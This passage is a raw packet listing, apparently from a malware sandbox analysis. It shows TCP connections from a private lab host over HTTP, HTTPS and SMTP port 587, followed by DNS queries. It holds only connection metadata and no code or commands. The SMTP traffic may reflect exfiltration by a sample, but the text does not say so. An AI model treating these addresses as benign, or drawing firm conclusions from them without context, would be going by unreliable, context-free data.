                                                    Jan 27, 2021 15:15:04.412246943 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412261963 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412271976 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412278891 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412298918 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412316084 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412322998 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412333965 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412349939 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412359953 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412365913 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412381887 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412388086 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412399054 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412415028 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412432909 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412434101 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412450075 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412458897 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412467003 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412483931 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412499905 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412499905 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412517071 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412532091 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412534952 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412552118 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412559032 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412571907 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412590027 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412591934 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412602901 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412620068 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412636042 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412653923 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412671089 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412688017 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.412693977 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.412739992 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.458673954 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458702087 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458714962 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458728075 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458745003 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458764076 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458781004 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458796024 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458801985 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.458808899 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458827972 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458844900 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458861113 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458878040 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458898067 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458914042 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.458918095 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.458965063 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.459568024 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.459585905 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.459602118 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.459618092 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.459635019 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.459645987 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.459652901 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.459702969 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.460072041 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460144997 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.460150003 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460171938 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460190058 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460242033 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.460314989 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460338116 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460354090 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460372925 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460387945 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.460388899 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460407019 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460426092 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460428953 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.460445881 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460464001 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460480928 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460494041 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460519075 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.460525990 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460546017 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460562944 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460580111 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460582018 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.460597038 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460617065 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460637093 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460645914 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.460654020 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460670948 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460685968 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460690022 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.460702896 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460720062 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.460752010 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.460802078 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.508176088 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508219957 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508259058 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508327007 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.508337021 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508388042 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508433104 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.508443117 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508481979 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508519888 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508558989 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508564949 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.508596897 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508635998 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508663893 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.508673906 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.508675098 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508724928 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508739948 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.508769035 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508806944 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508845091 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508845091 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.508883953 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508919001 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508951902 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.508965015 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.508979082 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.509007931 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509056091 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509076118 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.509099007 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509136915 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509174109 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509190083 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.509212017 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509248972 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509258986 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.509287119 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509325027 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509327888 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.509372950 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509427071 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.509442091 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509480953 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509526968 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.509527922 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509567022 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509599924 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.509603977 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509651899 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509694099 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.509701967 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.509784937 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510025978 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510080099 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510118008 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510154963 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510159969 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510194063 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510231018 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510231972 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510278940 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510307074 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510322094 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510361910 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510400057 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510401011 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510441065 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510477066 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510479927 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510514975 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510550976 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510551929 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510608912 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510627031 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510653019 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510689974 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510735035 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510735989 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510776997 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510811090 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510812044 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510849953 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510886908 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510896921 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510922909 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510960102 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.510961056 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.510998011 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511039019 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.511048079 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511091948 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511126995 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.511136055 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511179924 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511209011 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.511217117 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511254072 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511291027 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511298895 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.511328936 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511374950 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:04.511377096 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511411905 CET8049721193.239.147.103192.168.2.3
                                                    Jan 27, 2021 15:15:04.511478901 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:12.834208012 CET4972180192.168.2.3193.239.147.103
                                                    Jan 27, 2021 15:15:13.012614012 CET49730443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.055445910 CET44349730151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.055532932 CET49730443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.082458973 CET49730443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.126568079 CET44349730151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.126647949 CET44349730151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.126682043 CET44349730151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.126734972 CET49730443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.145935059 CET49730443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.150422096 CET49731443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.188869953 CET44349730151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.192898035 CET44349731151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.192995071 CET49731443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.193727970 CET49731443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.236875057 CET44349731151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.237226009 CET44349731151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.237251043 CET44349731151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.237329960 CET49731443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.239945889 CET49731443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.243701935 CET49732443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.282432079 CET44349731151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.288918972 CET44349732151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.289066076 CET49732443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.290317059 CET49732443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.332880974 CET44349732151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.336129904 CET44349732151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.336520910 CET44349732151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.336616039 CET49732443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.343419075 CET49732443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.345854998 CET49733443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.386022091 CET44349732151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.388273954 CET44349733151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.388403893 CET49733443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.389684916 CET49733443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.432136059 CET44349733151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.432163000 CET44349733151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.432178974 CET44349733151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.432251930 CET49733443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.435597897 CET49733443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:13.483647108 CET44349733151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:13.985789061 CET4973480192.168.2.3147.75.47.199
                                                    Jan 27, 2021 15:15:14.141225100 CET8049734147.75.47.199192.168.2.3
                                                    Jan 27, 2021 15:15:14.141433954 CET4973480192.168.2.3147.75.47.199
                                                    Jan 27, 2021 15:15:14.142913103 CET4973480192.168.2.3147.75.47.199
                                                    Jan 27, 2021 15:15:14.300801039 CET8049734147.75.47.199192.168.2.3
                                                    Jan 27, 2021 15:15:14.300822020 CET8049734147.75.47.199192.168.2.3
                                                    Jan 27, 2021 15:15:14.300829887 CET8049734147.75.47.199192.168.2.3
                                                    Jan 27, 2021 15:15:14.301477909 CET4973480192.168.2.3147.75.47.199
                                                    Jan 27, 2021 15:15:14.301492929 CET4973480192.168.2.3147.75.47.199
                                                    Jan 27, 2021 15:15:14.459307909 CET8049734147.75.47.199192.168.2.3
                                                    Jan 27, 2021 15:15:15.574553013 CET49735443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:15.617335081 CET44349735151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:15.617430925 CET49735443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:15.618047953 CET49735443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:15.661521912 CET44349735151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:15.661550999 CET44349735151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:15.661566019 CET44349735151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:15.661636114 CET49735443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:15.663796902 CET49735443192.168.2.3151.101.0.133
                                                    Jan 27, 2021 15:15:15.708930969 CET44349735151.101.0.133192.168.2.3
                                                    Jan 27, 2021 15:15:15.973541021 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.022650003 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.022759914 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.080607891 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.080883026 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.130538940 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.134344101 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.134633064 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.186044931 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.186659098 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.237952948 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.237977028 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.238143921 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.246917009 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.299015045 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.344227076 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.354690075 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.405006886 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.417948961 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.467508078 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.468110085 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.521284103 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.892911911 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.896394968 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:16.944624901 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.944956064 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:16.973335981 CET49736587192.168.2.3108.177.119.109
                                                    Jan 27, 2021 15:15:17.021986008 CET58749736108.177.119.109192.168.2.3
                                                    Jan 27, 2021 15:15:17.022253036 CET49736587192.168.2.3108.177.119.109

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 27, 2021 15:14:59.332345963 CET6083153192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:14:59.383230925 CET53608318.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:00.263602018 CET6010053192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:00.314697027 CET53601008.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:01.504172087 CET5319553192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:01.552279949 CET53531958.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:02.446263075 CET5014153192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:02.498785019 CET53501418.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:03.252521038 CET5302353192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:03.302258968 CET53530238.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:04.196850061 CET4956353192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:04.244673967 CET53495638.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:05.022871971 CET5135253192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:05.073025942 CET53513528.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:06.309909105 CET5934953192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:06.367492914 CET53593498.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:07.083122015 CET5708453192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:07.131283998 CET53570848.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:09.270239115 CET5882353192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:09.320410013 CET53588238.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:10.437478065 CET5756853192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:10.494224072 CET53575688.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:11.377993107 CET5054053192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:11.430713892 CET53505408.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:12.852633953 CET5436653192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:12.913172007 CET5303453192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:12.915644884 CET53543668.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:12.931613922 CET5776253192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:12.963109970 CET53530348.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:12.987937927 CET53577628.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:13.925585985 CET5543553192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:13.984045029 CET53554358.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:15.898952007 CET5071353192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:15.972109079 CET53507138.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:28.285253048 CET5613253192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:28.336141109 CET53561328.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:28.685240984 CET5898753192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:28.745198011 CET53589878.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:36.386214972 CET5657953192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:36.448751926 CET53565798.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:47.392508030 CET6063353192.168.2.38.8.8.8
                                                    Jan 27, 2021 15:15:47.465325117 CET53606338.8.8.8192.168.2.3
                                                    Jan 27, 2021 15:15:47.894746065 CET6129253192.168.2.38.8.8.8
